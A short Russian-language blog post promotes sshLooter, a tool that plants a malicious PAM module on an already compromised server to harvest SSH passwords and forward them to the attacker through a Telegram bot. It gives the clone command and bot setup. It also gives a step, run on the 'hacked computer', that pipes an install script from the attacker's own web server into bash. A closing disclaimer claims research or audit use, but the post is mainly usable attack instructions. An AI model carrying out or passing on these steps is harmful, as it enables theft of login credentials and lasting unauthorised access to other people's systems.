Недавно я опубликовал, как получить пароль ssh с помощью strace, но он не эффективен на 100%, потому что вывод strace изменяется на разных дистрибутивах, поэтому для поиска другого подхода я нашел этот сайт ChokePoint, где они показывают, как создать модуль PAM с использованием python для регистрации неудачные попытки ssh, теперь все, что мне нужно сделать, это изменение, когда они регистрируют пароль.
Исходный скрипт, использует функцию auth_log при неудачном входе в систему.
Установка
# git clone https://github.com/mthbernardes/sshLooter.git # cd sshLooter
Настройка
Отредактируйте скрипт на install.sh и добавьте свой бот телеграмма и ваш идентификатор пользователя.
Позвоните @botfather в телеграмм, чтобы создать бота, и вызовите @userinfobot, чтобы получить идентификатор пользователя
Использование
На вашем сервере выполните.
# python -m SimpleHTTPServer
На взломанном компьютере выполните.
# curl http: // yourserverip: 8000 / install.sh | bash
Оригинальный скрипт от
CheckPoint
Скачать sshLooter
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.